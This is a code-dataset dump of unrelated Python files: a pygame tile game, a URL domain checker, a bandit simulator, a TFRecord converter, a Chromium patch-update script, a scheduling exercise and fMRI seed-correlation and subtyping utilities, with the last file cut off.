range(BOARD_WIDTH):\r\n draw_tile(tile_x, tile_y)\r\n \r\n for tile_x in range(BOARD_WIDTH):\r\n for tile_y in range(BOARD_WIDTH):\r\n draw_tile2(tile_x, tile_y)\r\n\r\n for tile_x in range(BOARD_WIDTH):\r\n for tile_y in range(BOARD_WIDTH):\r\n draw_icon(icons, tile_x, tile_y)\r\n\r\n for tile_x in range(BOARD_WIDTH):\r\n for tile_y in range(BOARD_WIDTH):\r\n draw_icon2(icons2, tile_x, tile_y)\r\n\r\n DISPLAY_SURFACE.blit(new_surf, new_rect)\r\n\r\ndef display_choosed(list, shape, color, point, size):\r\n left, top = 280, 20\r\n if shape == CIRCLE:\r\n center_point = (left + 40, top + 40)\r\n if size == SMALL:\r\n pygame.draw.circle(DISPLAY_SURFACE, color, center_point, 20)\r\n elif size == BIG:\r\n pygame.draw.circle(DISPLAY_SURFACE, color, center_point, 30)\r\n if point:\r\n pygame.draw.circle(DISPLAY_SURFACE, POINT_COLOR, center_point, 10)\r\n elif shape == SQUARE:\r\n center_point = (left + 40, top + 40)\r\n if size == SMALL:\r\n rect = (left + 20, top + 20, 40, 40)\r\n elif size == BIG:\r\n rect = (left + 10, top + 10, 60, 60)\r\n pygame.draw.rect(DISPLAY_SURFACE, color, rect)\r\n if point:\r\n pygame.draw.circle(DISPLAY_SURFACE, POINT_COLOR, center_point, 10)\r\n\r\ndef draw_icon(list, tile_x, tile_y):\r\n shape, color, point, size = list[tile_x][tile_y][0], list[tile_x][tile_y][1], list[tile_x][tile_y][2], list[tile_x][tile_y][3]\r\n left, top = get_left_top_of_tile(tile_x, tile_y)\r\n if shape == CIRCLE:\r\n center_point = (left + 40, top + 40)\r\n if size == SMALL:\r\n pygame.draw.circle(DISPLAY_SURFACE, color, center_point, 20)\r\n elif size == BIG:\r\n pygame.draw.circle(DISPLAY_SURFACE, color, center_point, 30)\r\n if point:\r\n pygame.draw.circle(DISPLAY_SURFACE, POINT_COLOR, center_point, 10)\r\n elif shape == SQUARE:\r\n center_point = (left + 40, top + 40)\r\n if size == SMALL:\r\n rect = (left + 20, top + 20, 40, 40)\r\n elif size == BIG:\r\n rect = (left + 10, top + 10, 60, 60)\r\n pygame.draw.rect(DISPLAY_SURFACE, color, rect)\r\n if point:\r\n pygame.draw.circle(DISPLAY_SURFACE, POINT_COLOR, center_point, 10)\r\n \r\ndef draw_icon2(list, tile_x, tile_y):\r\n shape, color, point, size = list[tile_x][tile_y][0], list[tile_x][tile_y][1], list[tile_x][tile_y][2], list[tile_x][tile_y][3]\r\n left, top = get_left_top_of_tile2(tile_x, tile_y)\r\n if shape == CIRCLE:\r\n center_point = (left + 40, top + 40)\r\n if size == SMALL:\r\n pygame.draw.circle(DISPLAY_SURFACE, color, center_point, 20)\r\n elif size == BIG:\r\n pygame.draw.circle(DISPLAY_SURFACE, color, center_point, 30)\r\n if point:\r\n pygame.draw.circle(DISPLAY_SURFACE, POINT_COLOR, center_point, 10)\r\n elif shape == SQUARE:\r\n center_point = (left + 40, top + 40)\r\n if size == SMALL:\r\n rect = (left + 20, top + 20, 40, 40)\r\n elif size == BIG:\r\n rect = (left + 10, top + 10, 60, 60)\r\n pygame.draw.rect(DISPLAY_SURFACE, color, rect)\r\n if point:\r\n pygame.draw.circle(DISPLAY_SURFACE, POINT_COLOR, center_point, 10)\r\n\r\ndef get_tile_clicked(x, y):\r\n for tile_x in range(BOARD_WIDTH):\r\n for tile_y in range(BOARD_HEIGHT):\r\n left, top = get_left_top_of_tile(tile_x, tile_y)\r\n tile_rect = pygame.Rect(left, top, TILE_SIZE, TILE_SIZE)\r\n if tile_rect.collidepoint(x, y):\r\n return (tile_x, tile_y)\r\n return (None, None)\r\n\r\ndef get_tile_clicked2(x, y):\r\n for tile_x in range(BOARD_WIDTH):\r\n for tile_y in range(BOARD_HEIGHT):\r\n left, top = get_left_top_of_tile2(tile_x, tile_y)\r\n tile_rect = pygame.Rect(left, top, TILE_SIZE, TILE_SIZE)\r\n if tile_rect.collidepoint(x, y):\r\n return (tile_x, tile_y)\r\n return (None, None)\r\n\r\ndef check_for_quit(icons, tile_x, tile_y):\r\n list = [None, None, None, None]\r\n lp_icon = icons[tile_x][tile_y]\r\n top_left = True\r\n top_right = True\r\n bottom_left = True\r\n bottom_right = True\r\n for i in range(4): #checks horizontal line\r\n icon = icons[i][tile_y]\r\n list[i] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n if compare(list):\r\n return True\r\n for i in range(4): #checks vertical line\r\n icon = icons[tile_x][i]\r\n list[i] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n if compare(list):\r\n return True\r\n if tile_x == 0:\r\n top_left = False\r\n bottom_left = False\r\n if tile_x == 3:\r\n top_right = False\r\n bottom_right = False\r\n if tile_y == 0:\r\n top_left = False\r\n top_right = False\r\n if tile_y == 3:\r\n bottom_left = False\r\n bottom_right = False\r\n if top_left:\r\n icon = icons[tile_x][tile_y]\r\n list[0] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n icon = icons[tile_x][tile_y - 1]\r\n list[1] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n icon = icons[tile_x - 1][tile_y - 1]\r\n list[2] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n icon = icons[tile_x - 1][tile_y]\r\n list[3] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n if compare(list):\r\n return True\r\n if top_right:\r\n icon = icons[tile_x][tile_y]\r\n list[0] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n icon = icons[tile_x][tile_y - 1]\r\n list[1] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n icon = icons[tile_x + 1][tile_y - 1]\r\n list[2] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n icon = icons[tile_x + 1][tile_y]\r\n list[3] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n if compare(list):\r\n return True\r\n if bottom_left:\r\n icon = icons[tile_x][tile_y]\r\n list[0] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n icon = icons[tile_x][tile_y + 1]\r\n list[1] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n icon = icons[tile_x - 1][tile_y + 1]\r\n list[2] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n icon = icons[tile_x - 1][tile_y]\r\n list[3] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n if compare(list):\r\n return True\r\n if bottom_right:\r\n icon = icons[tile_x][tile_y]\r\n list[0] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n icon = icons[tile_x][tile_y + 1]\r\n list[1] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n icon = icons[tile_x + 1][tile_y + 1]\r\n list[2] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n icon = icons[tile_x + 1][tile_y]\r\n list[3] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n if compare(list):\r\n return True\r\n return False\r\n\r\ndef check_if_same(icons, lp_icon, icon, tile_x, tile_y):\r\n values = []\r\n for i in range(4):\r\n if icon[i] == lp_icon[i]:\r\n values.append(1)\r\n else:\r\n values.append(0)\r\n return (values)\r\n\r\ndef compare(list):\r\n for i in range(4):\r\n count = 0\r\n for j in range(4):\r\n count += list[j][i]\r\n if count == 4:\r\n return True\r\n return False \r\n \r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"Sklenda.py","file_name":"Sklenda.py","file_ext":"py","file_size_in_byte":14893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"490030322","text":"import functools\nfrom urllib.parse import urlparse\n\nfrom gatling_gun.error.error_text import ErrorText\nfrom gatling_gun.constants.gg_constants import GGConstants\n\nclass DomainManager():\n \"\"\"\n Collects all the methods that deal with verifying and/or formatting data that has to do with\n our set of known domains.\n \"\"\"\n\n @staticmethod\n def are_known(urls):\n \"\"\"\n Verify that each url in a list of urls comes from a domain that we know how to parse.\n\n Parameters:\n -----------\n urls: a list of urls (strings) to verify\n\n Returns:\n --------\n true if everything checks out, else false.\n \"\"\"\n dm = DomainManager\n if not urls:\n return True\n else:\n return functools.reduce(lambda x, y: x and y, [dm.verify_url(url) for url in urls])\n\n @staticmethod\n def verify_url(url):\n \"\"\"\n Verify that the given url comes from a domain that we know how to parse.\n\n Parameters:\n -----------\n url: the url to verify\n\n Returns:\n --------\n true if everything checks out, else false.\n \"\"\"\n domain = DomainManager.resolve(url)\n\n if domain in GGConstants.KNOWN_DOMAINS.values():\n return True\n else:\n return False\n\n @staticmethod\n def find_unknown_urls(urls):\n \"\"\"\n Parameters:\n -----------\n urls: a list of urls to search for unknown domains.\n\n Returns:\n --------\n a list of all the urls in @urls that come from unknown domains.\n \"\"\"\n return [x for x in urls if not DomainManager.verify_url(x)]\n\n @staticmethod\n def resolve(url):\n \"\"\"\n Get the domain from a url\n\n Parameters:\n -----------\n url:\n\n Returns:\n --------\n the domain of @url\n \"\"\"\n parsed = urlparse(url)\n\n if not parsed.scheme or not parsed.netloc:\n print(ErrorText.invalid_url(url))\n return None\n else:\n return '{uri.scheme}://{uri.netloc}/'.format(uri = parsed)\n\n @staticmethod\n def toronto_star(domain):\n \"\"\"\n Returns:\n --------\n true if @domain is the domain of the Toronto Star website\n \"\"\"\n gg = GGConstants\n if domain == gg.KNOWN_DOMAINS[gg.TORONTO_STAR]:\n return True\n else:\n return False\n\n @staticmethod\n def blog_to(domain):\n \"\"\"\n Returns:\n --------\n True if @domain is the domain of the BlogTO website\n \"\"\"\n gg = GGConstants\n if domain == gg.KNOWN_DOMAINS[gg.BLOG_TO]:\n return True\n else:\n return False\n","sub_path":"gatling_gun/web/domain_manager.py","file_name":"domain_manager.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"430701805","text":"import numpy as np\n\n\ndef simulate(runs, times, bandits, envs):\n rewards = np.zeros((len(bandits), runs, times))\n for i, bandit in enumerate(bandits):\n env = envs[i]\n for r in range(runs):\n bandit.init()\n env.init()\n for t in range(times):\n action = bandit.act()\n reward = env.step(action)\n bandit.step(reward)\n rewards[i, r, t] = reward\n mean_rewards = rewards.mean(axis=1)\n return mean_rewards","sub_path":"RL/Multi-armedBandits/simulate.py","file_name":"simulate.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"555963306","text":"import os\nimport random\nimport xml.etree.ElementTree as ET\n\nimport tensorflow as tf\n\n\ndef int64_feature(value):\n \"\"\"Wrapper for inserting int64 features into Example proto.\n \"\"\"\n if not isinstance(value, list):\n value = [value]\n return tf.train.Feature(int64_list=tf.train.Int64List(value=value))\n\n\ndef float_feature(value):\n \"\"\"Wrapper for inserting float features into Example proto.\n \"\"\"\n if not isinstance(value, list):\n value = [value]\n return tf.train.Feature(float_list=tf.train.FloatList(value=value))\n\n\ndef bytes_feature(value):\n \"\"\"Wrapper for inserting bytes features into Example proto.\n \"\"\"\n if not isinstance(value, list):\n value = [value]\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=value))\n\n\nDEFUALT_PATHS = {\n 'images': '/mnt/disk/chenyifeng/VOC2012/JPEGImages',\n 'annotations': '/mnt/disk/chenyifeng/VOC2012/Annotations',\n 'segmentations': '/mnt/disk/chenyifeng/VOC2012/SegmentationClassAug'\n}\n\n\nclass PascalVocWriter:\n \"\"\"\n PASCAL VOC 2012 DataSet to TF record Writer\n \"\"\"\n\n def __init__(self, paths=DEFUALT_PATHS):\n self.img_path = paths['images']\n self.ano_path = paths['annotations']\n self.sgm_path = paths['segmentations']\n def convert_to_example(self, file_name):\n img_path = os.path.join(self.img_path, file_name + '.jpg')\n ano_path = os.path.join(self.ano_path, file_name + '.xml')\n sgm_path = os.path.join(self.sgm_path, file_name + '.png')\n\n img_data = tf.gfile.FastGFile(img_path, 'rb').read()\n sgm_data = tf.gfile.FastGFile(sgm_path, 'rb').read()\n\n # img_data = imread(img_path).tostring()\n # sgm_data = imread(sgm_path).tostring()\n\n anno_tree = ET.parse(ano_path)\n anno_root = anno_tree.getroot()\n\n # is_sgmt = int(anno_root.find('segmented').text)\n # if is_sgmt == 0:\n # print('{} is not a Segmentation Sample. So Skipped'.format(file_name))\n\n size = anno_root.find('size')\n shape = [int(size.find('height').text),\n int(size.find('width').text),\n int(size.find('depth').text)]\n\n image_format = b'JPEG'\n segment_format = b'PNG'\n\n example = tf.train.Example(\n features=tf.train.Features(\n feature={\n 'image/name':bytes_feature(file_name.encode()),\n 'image/height': int64_feature(shape[0]),\n 'image/width': int64_feature(shape[1]),\n 'image/channels': int64_feature(shape[2]),\n 'image/shape': int64_feature(shape),\n 'image/format': bytes_feature(image_format),\n 'image/encoded': bytes_feature(img_data),\n 'label/format': bytes_feature(segment_format),\n 'label/encoded': bytes_feature(sgm_data)\n }\n )\n )\n return example\n\n def add_to_record(self, file_name, tfrecord_writer):\n example = self.convert_to_example(file_name)\n tfrecord_writer.write(example.SerializeToString())\n\n def run(self, pic_names, output_dir, shuffling=False, size=300):\n if shuffling:\n random.seed(1314)\n random.shuffle(pic_names)\n\n total_num = len(pic_names)\n\n for start in range(0, total_num, size):\n tf_filename = '%s/%03d.tfrecord' % (output_dir, start // size)\n tf_recorder = tf.python_io.TFRecordWriter(tf_filename)\n print('=>' * (start * 5 // total_num) + '{:.0f}% Finished'.format(start / total_num * 100))\n for pic_idx in range(start, min(start + 300, total_num)):\n pic_name = pic_names[pic_idx]\n self.add_to_record(pic_name, tf_recorder)\n\n print('=>' * 5 + '{:.0f}% Finished'.format(100))\n\n\ndef convert_val():\n writer = PascalVocWriter()\n pic_names = open('/mnt/disk/chenyifeng/VOC2012/ImageSets/Segmentation/val.txt').readlines()\n pic_names = [i.strip(' \\n') for i in pic_names]\n writer.run(pic_names, output_dir='/mnt/disk/chenyifeng/VOC2012/tf_segments/tf_records/val')\n\n\ndef convert_train():\n writer = PascalVocWriter()\n pic_names = open('/mnt/disk/chenyifeng/VOC2012/ImageSets/Segmentation/train.txt').readlines()\n pic_names = [i.strip(' \\n') for i in pic_names]\n writer.run(pic_names, output_dir='/mnt/disk/chenyifeng/VOC2012/tf_segments/tf_records/train')\n\n\nif __name__ == '__main__':\n # convert_train()\n convert_val()\n","sub_path":"datasets/pasval_voc_writer.py","file_name":"pasval_voc_writer.py","file_ext":"py","file_size_in_byte":4522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"530828088","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Copyright (C) 2020 ByTanuky\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\nimport os\nimport subprocess\nimport sys\nimport re\n\nfrom ordered_set import OrderedSet\n\nfrom constants import CHROMIUM_SRC_DIR, PATCHES_DIR, PATCH_LIST_FILE\nfrom utils import get_patch_filename, get_original_filename\n\nGIT_DIFF_PATTERN = 'diff --git '\n\nEXCLUSION_FILES = [\n # locale resources\n 'chrome/app/chromium_strings.grd',\n 'chrome/app/settings_chromium_strings.grdp',\n 'chrome/app/settings_strings.grdp',\n 'components/components_chromium_strings.grd',\n # branding resources\n 'chrome/app/theme/chromium/BRANDING',\n]\n\n\ndef main(args):\n ret = subprocess.check_output(\n ['git', 'checkout'], cwd=CHROMIUM_SRC_DIR).decode('utf-8').split('\\n')\n if len(ret) < 3:\n print('No diff available.')\n exit(0)\n\n ret = ret[:-3]\n total = len(ret)\n print('Updating files...')\n\n new_patch_list = OrderedSet()\n\n unified_diff = subprocess.check_output(\n ['git', 'diff', '--ignore-space-at-eol'],\n cwd=CHROMIUM_SRC_DIR\n ).decode('utf-8')\n\n splitted = unified_diff.split(GIT_DIFF_PATTERN)\n regex = re.compile('(?<=a/)(.*)(?= b/)')\n\n i = 0\n for entry in splitted:\n if len(entry) == 0:\n continue\n\n filename = regex.findall(entry)[0]\n\n if filename in EXCLUSION_FILES:\n total -= 1\n continue\n\n new_patch_list.add(filename)\n patch_filename = get_patch_filename(filename)\n\n print('[%d/%d]' % (i, total), filename)\n\n # write to file\n with open(os.path.join(PATCHES_DIR, patch_filename), 'w', newline='\\n') as f:\n f.write(GIT_DIFF_PATTERN)\n f.write(entry)\n\n i += 1\n\n # remove old patches\n if os.path.exists(PATCH_LIST_FILE):\n print('Removing old patches...')\n\n removed_count = 0\n old_patches = os.listdir(PATCHES_DIR)\n for op in old_patches:\n if not op.endswith('.patch'):\n continue\n\n orig_filename = get_original_filename(op)\n if orig_filename not in new_patch_list:\n os.remove(os.path.join(PATCHES_DIR, op))\n removed_count += 1\n print('Removed %d unused patch(es).' % removed_count)\n\n print('Writing new patch list...')\n with open(PATCH_LIST_FILE, 'w') as f:\n f.writelines('\\n'.join(new_patch_list))\n\n print('Patches updated.')\n\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv[1:]))\n","sub_path":"scripts/update_patches.py","file_name":"update_patches.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"635168105","text":"import heapq\n\nT = int(input())\n\nfor t in range(T):\n N = int(input())\n\n bids = {}\n\n for n in range(N):\n f, d = [int(i) for i in input().split(\" \")]\n try:\n bids[d].append(f)\n except:\n bids[d] = [f]\n\n result = [i for i in sorted(bids.items(), key=lambda b: b[0], reverse=True)]\n\n # print(result)\n possible = []\n answer = 0\n interval = result[0][0]\n for i in result:\n for j in range(interval - i[0]):\n if possible:\n answer += -heapq.heappop(possible)\n for k in i[1]:\n heapq.heappush(possible, -k)\n\n answer += -heapq.heappop(possible)\n\n interval = i[0] - 1\n # print(answer)\n\n for j in range(interval):\n if possible:\n answer += -heapq.heappop(possible)\n\n # print(\"answer: \", answer)\n print(answer)\n\n\n# h = []\n#\n# heapq.heappush(h, -1)\n# heapq.heappush(h, [-3, -4])\n# heapq.heappush(h, -5)\n# heapq.heappush(h, -2)\n# heapq.heappush(h, -10)\n# heapq.heappush(h, -4)\n#\n# print(heapq.heappop(h))\n# print(heapq.heappop(h))\n# print(heapq.heappop(h))\n#\n# print(h)","sub_path":"CSED331/ASSN4/Exhibition.py","file_name":"Exhibition.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"62101348","text":"import warnings\nimport numpy as np\nimport scipy as sp\nfrom scipy import cluster as scl\nfrom nilearn import input_data as nid\nfrom sklearn import linear_model as sln\nfrom sklearn import preprocessing as skp\n\n\ndef pearson_r(data, pheno, covariate_name):\n # Remove missing values\n mask = ~pheno[covariate_name].isnull().values\n covariate = pheno[covariate_name]\n contrast_name = f'Pearson_r with {covariate_name}'\n r, p = sp.stats.pearsonr(data[mask], covariate[mask])\n result = {'pearson_r': r,\n 'p': p,\n 'contrast': contrast_name}\n return result\n\n\ndef t_test(data, pheno, group, case, control):\n # We cannot assume that the index is reset or consecutive from 0,\n # Let's instead get the precise position\n case_idx = np.array([pheno.index.get_loc(idx) for idx in pheno.query(f'{group} == \"{case}\"').index.values])\n control_idx = np.array([pheno.index.get_loc(idx) for idx in pheno.query(f'{group} == \"{control}\"').index.values])\n contrast_name = f'T_Test of {group}: {case} vs {control}'\n\n n_case = len(case_idx)\n n_control = len(control_idx)\n t, p = sp.stats.ttest_ind(data[case_idx], data[control_idx])\n mean_case = np.mean(data[case_idx])\n mean_control = np.mean(data[control_idx])\n pooled_std = np.sqrt((((n_case - 1) * np.square(np.std(data[case_idx]))) +\n ((n_control - 1) * np.square(np.std(data[case_idx])))) / (n_case + n_control - 2))\n cohens = (mean_case - mean_control) / pooled_std\n results = {'t': t,\n 'p': p,\n 'cohens_d': cohens,\n 'mean_case': mean_case,\n 'mean_control': mean_control,\n 'contrast': contrast_name,\n 'pooled_sd': pooled_std}\n return results\n\n\ndef mann_whitney_test(data, pheno, group, case, control):\n # We cannot assume that the index is reset or consecutive from 0,\n # Let's instead get the precise position\n case_idx = np.array([pheno.index.get_loc(idx) for idx in pheno.query(f'{group} == \"{case}\"').index.values])\n control_idx = np.array([pheno.index.get_loc(idx) for idx in pheno.query(f'{group} == \"{control}\"').index.values])\n contrast_name = f'Mann_Whitney_U of {group}: {case} vs {control}'\n\n n_case = len(case_idx)\n n_control = len(control_idx)\n u_right, p = sp.stats.mannwhitneyu(data[case_idx], data[control_idx], alternative='two-sided')\n median_case = np.median(data[case_idx])\n median_control = np.median(data[control_idx])\n u_left = n_case * n_control - u_right\n u_min = np.min([u_left, u_right])\n # Compute rank biserial correlation\n r_b = 1 - (2 * u_min) / (n_case * n_control)\n # Determine if cases > controls or reverse\n case_gt_con = u_right > u_min\n if not case_gt_con:\n r_b = -r_b\n results = {'U': u_min, 'p': p,\n 'rank_biserial_correlation': r_b,\n 'median_case': median_case,\n 'median_control': median_control,\n 'contrast': contrast_name}\n return results\n\n\ndef corr2_coeff(A, B):\n # Rowwise mean of input arrays & subtract from input arrays themeselves\n A_mA = A - A.mean(1)[:, None]\n B_mB = B - B.mean(1)[:, None]\n\n # Sum of squares across rows\n ssA = (A_mA ** 2).sum(1)\n ssB = (B_mB ** 2).sum(1)\n\n # Finally get corr coeff\n return np.dot(A_mA, B_mB.T) / np.sqrt(np.dot(ssA[:, None], ssB[None]))\n\n\ndef partial_seed_correlation(functional_image, atlas_image, mask_image):\n \"\"\"\n Return seed maps for each of the seed regions in 'atlas_image' while correcting for the average signal in all\n other seed regions.\n\n :param functional_image: subject level 4D nibale image file\n :param atlas_image:\n :param mask_image:\n :return:\n \"\"\"\n roi_masker = nid.NiftiMasker(mask_img=mask_image, verbose=0, standardize=False)\n atlas_masker = nid.NiftiLabelsMasker(labels_img=atlas_image,\n mask_img=mask_image,\n standardize=False)\n voxel_masker = nid.NiftiMasker(mask_img=mask_image, verbose=0, standardize=True)\n\n atlas = roi_masker.fit_transform(atlas_image)\n unique_rois = np.unique(atlas[atlas != 0])\n atlas_timeseries = atlas_masker.fit_transform(functional_image)\n\n seed_maps = list()\n for roi_id in range(atlas_timeseries.shape[1]):\n roi = unique_rois[roi_id]\n conf_id = [i for i in range(atlas_timeseries.shape[1]) if not i == roi_id]\n confound_timeseries = atlas_timeseries[:, conf_id]\n\n seed_atlas_i = roi_masker.inverse_transform(atlas == roi)\n seed_masker_stand = nid.NiftiLabelsMasker(labels_img=seed_atlas_i,\n mask_img=mask_image,\n standardize=True)\n\n voxel_timeseries = voxel_masker.fit_transform(functional_image, confounds=confound_timeseries)\n seed_timeseries = seed_masker_stand.fit_transform(functional_image, confounds=confound_timeseries)\n seed_correlation = np.dot(voxel_timeseries.T, seed_timeseries) / voxel_timeseries.shape[0]\n seed_maps.append(seed_correlation)\n\n seed_map_array = np.concatenate(seed_maps, -1)\n seed_correlations_fisher_z = np.arctanh(seed_map_array)\n return seed_correlations_fisher_z\n\n\n\ndef confound_corrected_seed_correlation(functional_image, atlas_image, mask_image, confound_image):\n \"\"\"\n\n :param functional_image: 4D nibabel image with time in the 4th dimension\n :param atlas_image: 3D nibabel image with 0 as background and integer values denoting ROIs\n :param mask_image: 3D mask image\n :param confound_image: A nibabel image with a single ROI for which we will compute the ROI timeseries and regress\n it from the voxel timeseries in the functional image before generating the seed maps.\n Can only contain\n :return:\n \"\"\"\n confound_masker = nid.NiftiLabelsMasker(labels_img=confound_image, mask_img=mask_image, standardize=False)\n voxel_masker = nid.NiftiMasker(mask_image, verbose=0, standardize=False)\n\n confound_ts = confound_masker.fit_transform(functional_image)\n resid_ts = voxel_masker.fit_transform(functional_image, confounds=confound_ts)\n resid_image = voxel_masker.inverse_transform(resid_ts)\n return seed_correlation(resid_image, atlas_image, mask_image)\n\n\ndef seed_correlation(functional_image, atlas_image, mask_image):\n \"\"\"\n\n :param functional_image: 4D nibabel image with time in the 4th dimension\n :param atlas_image: 3D nibabel image with integers for ROIs and 0 as background\n :param mask_image: 3D nibabel image with 0 as background and 1 as brain.\n :return: fisher z transformed correlations. shape = (n_voxels, n_regions)\n \"\"\"\n atlas_masker = nid.NiftiLabelsMasker(labels_img=atlas_image, mask_img=mask_image, standardize=True)\n brain_masker = nid.NiftiMasker(mask_image, verbose=0, standardize=True)\n seed_time_series = atlas_masker.fit_transform(functional_image)\n brain_time_series = brain_masker.fit_transform(functional_image)\n\n seed_correlations = np.dot(brain_time_series.T, seed_time_series) / seed_time_series.shape[0]\n seed_correlations_fisher_z = np.arctanh(seed_correlations)\n\n # seed_based_correlation_img = brain_masker.inverse_transform(seed_correlations_fisher_z.T)\n return seed_correlations_fisher_z\n\n\ndef nuisance_correction(data_stack, design_matrix, n_jobs=1):\n \"\"\"\n :param data_stack: 2D or 3D array of (n_subjects, n_voxels, n_seeds)\n :param design_matrix: patsy or numpy style design matrix (n_subjects, n_factors)\n :param n_jobs:\n :return: residuals as 2D or 3D array of same dimensions as input array\n \"\"\"\n model = sln.LinearRegression(fit_intercept=False, normalize=False, n_jobs=n_jobs)\n if data_stack.ndim == 3:\n n_seeds = data_stack.shape[2]\n residuals = np.stack([nuisance_correction(data_stack[..., seed_id], design_matrix, n_jobs)\n for seed_id in range(n_seeds)], -1)\n else:\n results = model.fit(design_matrix, data_stack)\n residuals = data_stack - results.predict(design_matrix)\n\n return residuals\n\n\ndef subtype_maps(data_stack, part, method=np.mean):\n \"\"\"\n\n :param data_stack: (n_subject, n_voxel, n_seed (optional)). 2D or 3D array of the data\n :param part: (n_subject, n_seed (optional) 1D or 2D array of subtype partitions. Zero values are ignored to allow\n for thresholded subtypes\n :param method: A function reference to compute the subtype map. Default is numpy.mean\n :return: numpy array for 2D input and list of numpy arrays for 3D input\n \"\"\"\n if data_stack.ndim == 3 or part.ndim == 2:\n if not (data_stack.ndim == 3 and part.ndim == 2) or not data_stack.shape[-1] == part.shape[-1]:\n raise Exception(f'data and part must have the same last dimension when run across seeds: '\n f'data({data_stack.shape}), part({part.shape})')\n n_iter = part.shape[-1]\n sbt_maps = [subtype_maps(data_stack[..., i], part[..., i]) for i in range(n_iter)]\n else:\n n_subtypes = np.sum(np.unique(part) != 0)\n sbt_maps = np.array([method(data_stack[part == sbt_id, :], 0) for sbt_id in range(1, n_subtypes + 1)])\n return sbt_maps\n\n\ndef constrain_partition(partition, min_cases=2):\n \"\"\"\n\n :param partition: 1D partition vector where each unique number corresponds to a part\n :param min_cases: the minimum number of occurrences for a part to be kept in the constrained partition\n :return:\n \"\"\"\n masked_partition = np.array([0 if sum(partition == p) < min_cases else p for p in partition])\n # The remaining elements will always be sorted so 0 can remain 0\n remaining_elements = list(np.unique(masked_partition))\n if 0 in remaining_elements:\n # Reassign values to the remaining partitions\n constrained_partition = np.array([remaining_elements.index(p) for p in masked_partition])\n else:\n # Nothing to do, all elements of the partition are more frequent than required\n constrained_partition = masked_partition\n\n return constrained_partition\n\n\ndef subtype_partition(data_stack, mode='classic', n_subtypes=3, dist_thr=0.7, part_thr=20):\n \"\"\"\n\n :param data_stack: 2D or 3D array (n_subjects, n_connections, n_seeds) (last optional)\n :param n_subtypes: int\n :param mode: str. Either 'classic' for regular subtypes, 'core' for thresholded subtypes, or 'relative' to have the\n thresholds interpreted as rank percentages.\n :param dist_thr: float. Thresholds clusters by cophenetic distance\n :param part_thr: int. Only keep parts that have at least this many occurrences.\n :return:\n \"\"\"\n if data_stack.ndim == 3:\n # Process recursively and stack the results along the last (new) dimension\n n_iter = data_stack.shape[2]\n part, dist, order = list(map(lambda x: np.stack(x, -1),\n zip(*[subtype_partition(data_stack[..., i], mode, n_subtypes, dist_thr, part_thr)\n for i in range(n_iter)])))\n else:\n if mode == 'classic':\n # Normalize to 0 mean and unit variance across voxels per subject\n norm = skp.scale(data_stack, axis=1)\n # Get the lower triangle of the distance metric\n dist = sp.spatial.distance.pdist(norm)\n # Build the cluster\n link = scl.hierarchy.linkage(dist, method='ward', optimal_ordering=True)\n order = scl.hierarchy.dendrogram(link, no_plot=True)['leaves']\n part = scl.hierarchy.fcluster(link, n_subtypes, criterion='maxclust')\n elif mode == 'core':\n sim = np.corrcoef(data_stack)\n dist = 1 - sim[np.triu(np.ones(shape=sim.shape), 1).astype(bool)]\n link = scl.hierarchy.linkage(dist, method='average', optimal_ordering=True)\n order = scl.hierarchy.dendrogram(link, no_plot=True)['leaves']\n full_partition = scl.hierarchy.fcluster(link, dist_thr, criterion='distance')\n part = constrain_partition(full_partition, min_cases=part_thr)\n if np.max(part) == 0:\n warnings.warn(f'Cannot find any subtypes that satisfy the criteria! Partition is empty.\\n'\n f' Subtyping {data_stack.shape[0]} cases in {mode} mode with a distance cutoff of '\n f'{dist_thr} and a minimum number of cases per subtype of {part_thr} ')\n elif mode == 'relative':\n sim = np.corrcoef(data_stack)\n n_subject = sim.shape[0]\n part_thr_emp = np.ceil(n_subject * part_thr).astype(int)\n dist = 1 - sim[np.triu(np.ones(shape=sim.shape), 1).astype(bool)]\n dist_thr_emp = np.percentile(dist, dist_thr)\n link = scl.hierarchy.linkage(dist, method='average', optimal_ordering=True)\n order = scl.hierarchy.dendrogram(link, no_plot=True)['leaves']\n full_partition = scl.hierarchy.fcluster(link, dist_thr_emp, criterion='distance')\n part = constrain_partition(full_partition, 